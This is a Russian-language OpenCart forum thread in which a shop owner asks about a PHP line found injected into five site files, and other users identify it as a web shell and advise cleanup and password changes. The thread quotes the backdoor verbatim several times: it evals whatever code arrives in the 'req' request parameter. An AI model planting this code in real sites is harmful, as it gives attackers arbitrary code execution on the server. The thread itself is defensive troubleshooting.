COVID2019 и это вот все. Друзья, вся эта история начинает плохо пахнет. Мойте руки, не ходите в люди. Отложите все плановые покупки и положите в носок заначку. Заприте ваших родителей, бабушек-дедушек на даче. Лучше перебдеть чем недобдеть. Берегите себя!

Помогите разобраться что это


Recommended Posts

С недавнего времени в 5 файлах появились вот такие строчки

  <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?><?php

1<?php$post_var="req";if(isset($_REQUEST[$post_var])){ eval(stripslashes($_REQUEST[$post_var]));exit();};?><?php$_['heading_title']='P

1<?php$post_var="req";if(isset($_REQUEST[$post_var])){ eval(stripslashes($_REQUEST[$post_var]));exit();};?><?php$_['heading_title']='·

1<?php$post_var="req";if(isset($_REQUEST[$post_var])){ eval(stripslashes($_REQUEST[$post_var]));exit();};?><?php class ControllerPayme

1<?php$post_var="req";if(isset($_REQUEST[$post_var])){ eval(stripslashes($_REQUEST[$post_var]));exit();};?><?php$_['heading_title']='L

Что это может быть и с чем это связано? Это выявлено айболитом для сайтов.

Ссылка на комментарий
Поделиться на других сайтах

Это выяснилось при скачивании копии сайта через фтп, антивирус стал ругаться и блокировать в карантин. Проверили через айболит похоже на вредоносный код. Не давно поменяли php версию на хостинге, может это как то повлиять или все же это взлом? Но при этом ни куда не перенаправляет, проверяли через счетчики на сайте, да и покупатели не жалуются, это появилось где-то со 2 февраля...

 

Ссылка на комментарий
Поделиться на других сайтах

1. или варезный модуль поставили

2. или рядом вордпресс\джумла на хостинге

но штука уж больно на шелл похожа

попасть в опенкарт могла двумя выше указанными путями

Ссылка на комментарий
Поделиться на других сайтах

второй сайт на джумле и недавно пытались установить новый шаблон, скорее всего с него все и началось, сделали бекап сайта на джумле, поменяли все доступы пароли. Папки с кракозябрами перестали появляться, но вот это так и есть. Не подскажите как исправить?

Ссылка на комментарий
Поделиться на других сайтах

чистить файлы в которых это есть

или если не меняли ничего то залить исходные из сборки

только вот поменяйте еще все пароли доступа к хостингу и в бд

и не забудьте потом поменять в config.php

Ссылка на комментарий
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вы вставили отформатированное содержимое.   Удалить форматирование

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Сейчас на странице   0 пользователей

    • Нет пользователей, просматривающих эту страницу